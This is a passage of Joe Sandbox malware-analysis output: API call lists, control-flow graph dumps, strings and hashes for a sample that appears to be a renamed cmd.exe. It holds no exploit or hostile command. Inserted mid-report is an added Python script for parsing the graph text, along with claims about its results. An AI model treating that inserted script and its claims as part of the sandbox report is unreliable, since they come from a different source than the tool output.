716->691 729 7ff6e94350dc-7ff6e94350e6 GlobalFree 724->729 725->729 729->698
APIs
• InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434D9A
  • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
• SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DBB
• _get_osfhandle.MSVCRT ref: 00007FF6E9434DCA
• GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DE0
• _get_osfhandle.MSVCRT ref: 00007FF6E9434DEE
• GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E04
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430589
  • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E943059E
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305AF
  • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E94305C5
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305EF
  • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E9430605
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430632
  • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E9430647
  • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
  • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
  • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
  • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
  • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
  • Part of subcall function 00007FF6E9434AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
  • Part of subcall function 00007FF6E9434AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
  • Part of subcall function 00007FF6E9435554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6E9434E35), ref: 00007FF6E94355DA
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435623
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435667
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E94356BE
  • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435702
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E35
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E81
• GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F69
• GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F95
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FB0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FC1
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FD8
• GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FF8
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435037
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943504B
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350DF
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350F2
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943510F
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435130
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943514A
• free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435175
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
  • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
  • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
  • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
Strings
Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction ID: a5e03e501005a527bfbbdda5d1ec8130c2024aa10fc9089661f826422e029ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C14263A08A46D6EB14DF61A8543B977A0FF89B91F448134D90EC77A1DF3EA44DC30A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 732 7ff6e9433c24-7ff6e9433c61 733 7ff6e9433c67-7ff6e9433c99 call 7ff6e942af14 call 7ff6e942ca40 732->733 734 7ff6e943ec5a-7ff6e943ec5f 732->734 743 7ff6e943ec97-7ff6e943eca1 call 7ff6e943855c 733->743 744 7ff6e9433c9f-7ff6e9433cb2 call 7ff6e942b900 733->744 734->733 736 7ff6e943ec65-7ff6e943ec6a 734->736 738 7ff6e943412e-7ff6e943415b call 7ff6e9438f80 736->738 744->743 749 7ff6e9433cb8-7ff6e9433cbc 744->749 750 7ff6e9433cbf-7ff6e9433cc7 749->750 750->750 751 7ff6e9433cc9-7ff6e9433ccd 750->751 752 7ff6e9433cd2-7ff6e9433cd8 751->752 753 7ff6e9433cda-7ff6e9433cdf 752->753 754 7ff6e9433ce5-7ff6e9433d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6e9433faa-7ff6e9433fb3 753->755 756 7ff6e9433fb8 754->756 757 7ff6e9433d68-7ff6e9433d6c 754->757 755->752 759 7ff6e9433fc6-7ff6e9433fec GetLastError call 7ff6e943855c call 7ff6e943a5d6 756->759 757->756 758 7ff6e9433d72-7ff6e9433dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6e9433dd3-7ff6e9433ddd 758->760 762 7ff6e9433ff1-7ff6e9434007 call 7ff6e943855c _local_unwind 759->762 760->762 763 7ff6e9433de3-7ff6e9433dfb 760->763 773 7ff6e943400c-7ff6e9434022 GetLastError 762->773 765 7ff6e9433e01-7ff6e9433e11 763->765 766 7ff6e94340fe-7ff6e9434119 call 7ff6e943855c _local_unwind 763->766 765->766 769 7ff6e9433e17-7ff6e9433e28 765->769 778 7ff6e943411a-7ff6e943412c call 7ff6e942ff70 call 7ff6e943855c 766->778 772 7ff6e9433e2c-7ff6e9433e34 769->772 772->772 775 7ff6e9433e36-7ff6e9433e3f 772->775 776 7ff6e9434028-7ff6e943402b 773->776 777 7ff6e9433e95-7ff6e9433e9c 773->777 779 7ff6e9433e42-7ff6e9433e55 775->779 776->777 780 7ff6e9434031-7ff6e9434047 call 7ff6e943855c _local_unwind 776->780 781 7ff6e9433e9e-7ff6e9433ec2 call 7ff6e9432978 777->781 782 7ff6e9433ecf-7ff6e9433ed3 777->782 778->738 784 7ff6e9433e66-7ff6e9433e8f 
GetFileAttributesW 779->784 785 7ff6e9433e57-7ff6e9433e60 779->785 804 7ff6e943404c-7ff6e9434062 call 7ff6e943855c _local_unwind 780->804 798 7ff6e9433ec7-7ff6e9433ec9 781->798 788 7ff6e9433f08-7ff6e9433f0b 782->788 789 7ff6e9433ed5-7ff6e9433ef7 GetFileAttributesW 782->789 784->773 784->777 785->784 796 7ff6e9433f9d-7ff6e9433fa5 785->796 794 7ff6e9433f0d-7ff6e9433f11 788->794 795 7ff6e9433f1e-7ff6e9433f40 SetCurrentDirectoryW 788->795 791 7ff6e9434067-7ff6e9434098 GetLastError call 7ff6e943855c _local_unwind 789->791 792 7ff6e9433efd-7ff6e9433f02 789->792 799 7ff6e943409d-7ff6e94340b3 call 7ff6e943855c _local_unwind 791->799 792->788 792->799 801 7ff6e9433f46-7ff6e9433f69 call 7ff6e943498c 794->801 802 7ff6e9433f13-7ff6e9433f1c 794->802 795->801 803 7ff6e94340b8-7ff6e94340de GetLastError call 7ff6e943855c _local_unwind 795->803 796->779 798->782 798->804 799->803 815 7ff6e94340e3-7ff6e94340f9 call 7ff6e943855c _local_unwind 801->815 816 7ff6e9433f6f-7ff6e9433f98 call 7ff6e943417c 801->816 802->795 802->801 803->815 804->791 815->766 816->778
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                                                                        • Instruction ID: 7e374998180753811e0c53a659e59f4b4d86c053be5e0ee11f8edd63c92f8fa0
                                                                                                                                                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                                                                        • Instruction Fuzzy Hash: C0D12A23609B85D2EA64DF35E4583AAB7A1FF84B40F844135DA4E837A4DF3DE548CB05
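The control_flow_graph text above packs the basic blocks of the function at 7ff6e9433c24 (block id, address range, the API/CRT or internal calls made in the block) and the edges between them (src->dst) into one run of tokens. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses that text into blocks and edges and then answers the questions the flat dump does not, which blocks call a given API, whether every block is reachable from the entry, and the shortest block path from the entry to the block that calls GetFullPathNameW, with the calls made along the way. The token grammar is inferred from the dump and is an assumption of this example, as are the `sub_<addr>` naming for internal calls, the choice of the lowest start address as the entry block, and the helper names (`parse_cfg`, `blocks_calling`, `reachable`, `shortest_path`, `calls_on_path`). The sample input is a trimmed excerpt of the graph text shown above.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")            # e.g. 752->754
ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")  # e.g. 7ff6e9433c24-7ff6e9433c61, or a lone address


@dataclass
class Block:
    start: int
    end: int
    calls: list = field(default_factory=list)  # API/CRT names, or "sub_<addr>" for internal calls


def parse_cfg(text):
    """Return (blocks, edges): blocks maps block id -> Block, edges is a list of (src, dst)."""
    tokens = text.replace("control_flow_graph", "").split()
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # A decimal id followed by a hex address (or range) opens a new block; call labels
        # are never purely decimal in this dump, so the test is unambiguous (assumption).
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")
            current = int(tok)
            blocks[current] = Block(int(lo, 16), int(hi or lo, 16))
            i += 2
            continue
        assert current is not None, f"label {tok!r} appears before any block"
        if tok == "call" and i + 1 < len(tokens):  # "call <addr>" = internal sub-function
            blocks[current].calls.append("sub_" + tokens[i + 1])
            i += 2
        else:                                       # bare name = imported API / CRT call
            blocks[current].calls.append(tok)
            i += 1
    return blocks, edges


def _bfs(edges, src):
    """Breadth-first search from src; returns {block: predecessor}, with src -> None."""
    adj = defaultdict(list)
    for a, b in edges:
        adj[a].append(b)
    prev, queue = {src: None}, deque([src])
    while queue:
        n = queue.popleft()
        for m in adj[n]:
            if m not in prev:
                prev[m] = n
                queue.append(m)
    return prev


def entry_block(blocks):
    """Assumption of this example: the block with the lowest start address is the entry."""
    return min(blocks, key=lambda b: blocks[b].start)


def blocks_calling(blocks, name):
    """Sorted ids of the blocks whose call list contains name."""
    return sorted(b for b, blk in blocks.items() if name in blk.calls)


def reachable(edges, src):
    """Block ids reachable from src (src included)."""
    return set(_bfs(edges, src))


def shortest_path(edges, src, dst):
    """Fewest-edges block path from src to dst, or [] when dst is unreachable."""
    prev = _bfs(edges, src)
    if dst not in prev:
        return []
    path = [dst]
    while prev[path[-1]] is not None:
        path.append(prev[path[-1]])
    return path[::-1]


def calls_on_path(blocks, path):
    """Calls made along a block path, in block order."""
    return [c for b in path for c in blocks[b].calls]


# Trimmed excerpt of the graph text for the function at 7ff6e9433c24 in this report.
SAMPLE_CFG = (
    "control_flow_graph 732 7ff6e9433c24-7ff6e9433c61 733 7ff6e9433c67-7ff6e9433c99 call 7ff6e942af14 "
    "call 7ff6e942ca40 732->733 734 7ff6e943ec5a-7ff6e943ec5f 732->734 743 7ff6e943ec97-7ff6e943eca1 "
    "call 7ff6e943855c 733->743 744 7ff6e9433c9f-7ff6e9433cb2 call 7ff6e942b900 733->744 734->733 "
    "736 7ff6e943ec65-7ff6e943ec6a 734->736 738 7ff6e943412e-7ff6e943415b call 7ff6e9438f80 736->738 "
    "744->743 749 7ff6e9433cb8-7ff6e9433cbc 744->749 750 7ff6e9433cbf-7ff6e9433cc7 749->750 750->750 "
    "751 7ff6e9433cc9-7ff6e9433ccd 750->751 752 7ff6e9433cd2-7ff6e9433cd8 751->752 753 7ff6e9433cda-7ff6e9433cdf "
    "752->753 754 7ff6e9433ce5-7ff6e9433d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 "
    "755 7ff6e9433faa-7ff6e9433fb3 753->755 756 7ff6e9433fb8 754->756 757 7ff6e9433d68-7ff6e9433d6c 754->757 "
    "755->752 759 7ff6e9433fc6-7ff6e9433fec GetLastError call 7ff6e943855c call 7ff6e943a5d6 756->759 "
    "757->756 758 7ff6e9433d72-7ff6e9433dcd towupper GetFullPathNameW 757->758 758->759"
)

if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    entry = entry_block(blocks)
    print(len(blocks), "blocks,", len(edges), "edges; unreachable:", sorted(set(blocks) - reachable(edges, entry)))
    path = shortest_path(edges, entry, blocks_calling(blocks, "GetFullPathNameW")[0])
    print("entry", entry, "->", path, calls_on_path(blocks, path))
```

Run on the excerpt, every block is reachable from block 732 and the only fewest-edges path to the GetFullPathNameW block is 732, 733, 744, 749, 750, 751, 752, 754, 757, 758, which passes the GetCurrentDirectoryW, towupper and iswalpha calls in block 754 first; the same two queries run unchanged over the full graph text of any function record on this page, since each record uses the same token layout.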

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 914 7ff6e9432394-7ff6e9432416 memset call 7ff6e942ca40 917 7ff6e943241c-7ff6e9432453 GetModuleFileNameW call 7ff6e943081c 914->917 918 7ff6e943e0d2-7ff6e943e0da call 7ff6e9434c1c 914->918 923 7ff6e9432459-7ff6e9432468 call 7ff6e943081c 917->923 924 7ff6e943e0db-7ff6e943e0ee call 7ff6e943498c 917->924 918->924 929 7ff6e943246e-7ff6e943247d call 7ff6e943081c 923->929 930 7ff6e943e0f4-7ff6e943e107 call 7ff6e943498c 923->930 924->930 935 7ff6e9432516-7ff6e9432529 call 7ff6e943498c 929->935 936 7ff6e9432483-7ff6e9432492 call 7ff6e943081c 929->936 937 7ff6e943e10d-7ff6e943e123 930->937 935->936 936->937 947 7ff6e9432498-7ff6e94324a7 call 7ff6e943081c 936->947 940 7ff6e943e13f-7ff6e943e17a _wcsupr 937->940 941 7ff6e943e125-7ff6e943e139 wcschr 937->941 945 7ff6e943e17c-7ff6e943e17f 940->945 946 7ff6e943e181-7ff6e943e199 wcsrchr 940->946 941->940 944 7ff6e943e27c 941->944 949 7ff6e943e283-7ff6e943e29b call 7ff6e943498c 944->949 948 7ff6e943e19c 945->948 946->948 956 7ff6e94324ad-7ff6e94324c5 call 7ff6e9433c24 947->956 957 7ff6e943e2a1-7ff6e943e2c3 _wcsicmp 947->957 951 7ff6e943e1a0-7ff6e943e1a7 948->951 949->957 951->951 954 7ff6e943e1a9-7ff6e943e1bb 951->954 958 7ff6e943e1c1-7ff6e943e1e6 954->958 959 7ff6e943e264-7ff6e943e277 call 7ff6e9431300 954->959 964 7ff6e94324ca-7ff6e94324db 956->964 962 7ff6e943e1e8-7ff6e943e1f1 958->962 963 7ff6e943e21a 958->963 959->944 968 7ff6e943e201-7ff6e943e210 962->968 969 7ff6e943e1f3-7ff6e943e1f6 962->969 967 7ff6e943e21d-7ff6e943e21f 963->967 965 7ff6e94324e9-7ff6e9432514 call 7ff6e9438f80 964->965 966 7ff6e94324dd-7ff6e94324e4 ??_V@YAXPEAX@Z 964->966 966->965 967->949 971 7ff6e943e221-7ff6e943e228 967->971 968->963 973 7ff6e943e212-7ff6e943e218 968->973 969->968 972 7ff6e943e1f8-7ff6e943e1ff 969->972 975 7ff6e943e22a-7ff6e943e231 971->975 976 
7ff6e943e254-7ff6e943e262 971->976 972->968 972->969 973->967 977 7ff6e943e234-7ff6e943e237 975->977 976->944 977->976 978 7ff6e943e239-7ff6e943e242 977->978 978->976 979 7ff6e943e244-7ff6e943e252 978->979 979->976 979->977
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                        • API String ID: 2622545777-4197029667
                                                                                                                                                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                                                                        • Instruction ID: 6466884da9807152d6b97d5d93e782d0e324c227afa02ad116da6a939ad33ced
                                                                                                                                                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                                                                        • Instruction Fuzzy Hash: EF916C63A0A686D6EF25CF71D8583B963A0FF58B84F444135CA0E87795DE3EE508C706

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction ID: 8ec1ff90e9fb9a4322e3816c0ad23d2cfe31b8354a8088ccf55bb780f563b8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction Fuzzy Hash: AC419DB6A19702CBE7159F64E8553787BA0BF9A751F449235C90EC2361DF3EA40CC70A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 992 7ff6e942c620-7ff6e942c66f GetConsoleTitleW 993 7ff6e942c675-7ff6e942c687 call 7ff6e942af14 992->993 994 7ff6e943c5f2 992->994 999 7ff6e942c689 993->999 1000 7ff6e942c68e-7ff6e942c69d call 7ff6e942ca40 993->1000 996 7ff6e943c5fc-7ff6e943c60c GetLastError 994->996 998 7ff6e943c5e3 call 7ff6e9423278 996->998 1004 7ff6e943c5e8-7ff6e943c5ed call 7ff6e943855c 998->1004 999->1000 1000->1004 1005 7ff6e942c6a3-7ff6e942c6ac 1000->1005 1004->994 1007 7ff6e942c954-7ff6e942c95e call 7ff6e943291c 1005->1007 1008 7ff6e942c6b2-7ff6e942c6c5 call 7ff6e942b9c0 1005->1008 1013 7ff6e943c5de-7ff6e943c5e0 1007->1013 1014 7ff6e942c964-7ff6e942c96b call 7ff6e94289c0 1007->1014 1015 7ff6e942c6cb-7ff6e942c6ce 1008->1015 1016 7ff6e942c9b5-7ff6e942c9b8 call 7ff6e9435c6c 1008->1016 1013->998 1020 7ff6e942c970-7ff6e942c972 1014->1020 1015->1004 1018 7ff6e942c6d4-7ff6e942c6e9 1015->1018 1023 7ff6e942c9bd-7ff6e942c9c9 call 7ff6e943855c 1016->1023 1021 7ff6e943c616-7ff6e943c620 call 7ff6e943855c 1018->1021 1022 7ff6e942c6ef-7ff6e942c6fa 1018->1022 1020->996 1024 7ff6e942c978-7ff6e942c99a towupper 1020->1024 1025 7ff6e943c627 1021->1025 1022->1025 1026 7ff6e942c700-7ff6e942c713 1022->1026 1039 7ff6e942c9d0-7ff6e942c9d7 1023->1039 1029 7ff6e942c9a0-7ff6e942c9a9 1024->1029 1031 7ff6e943c631 1025->1031 1030 7ff6e942c719-7ff6e942c72c 1026->1030 1026->1031 1029->1029 1034 7ff6e942c9ab-7ff6e942c9af 1029->1034 1035 7ff6e943c63b 1030->1035 1036 7ff6e942c732-7ff6e942c747 call 7ff6e942d3f0 1030->1036 1031->1035 1034->1016 1037 7ff6e943c60e-7ff6e943c611 call 7ff6e944ec14 1034->1037 1042 7ff6e943c645 1035->1042 1046 7ff6e942c8ac-7ff6e942c8af 1036->1046 1047 7ff6e942c74d-7ff6e942c750 1036->1047 1037->1021 1040 7ff6e942c9dd-7ff6e943c6da SetConsoleTitleW 1039->1040 1041 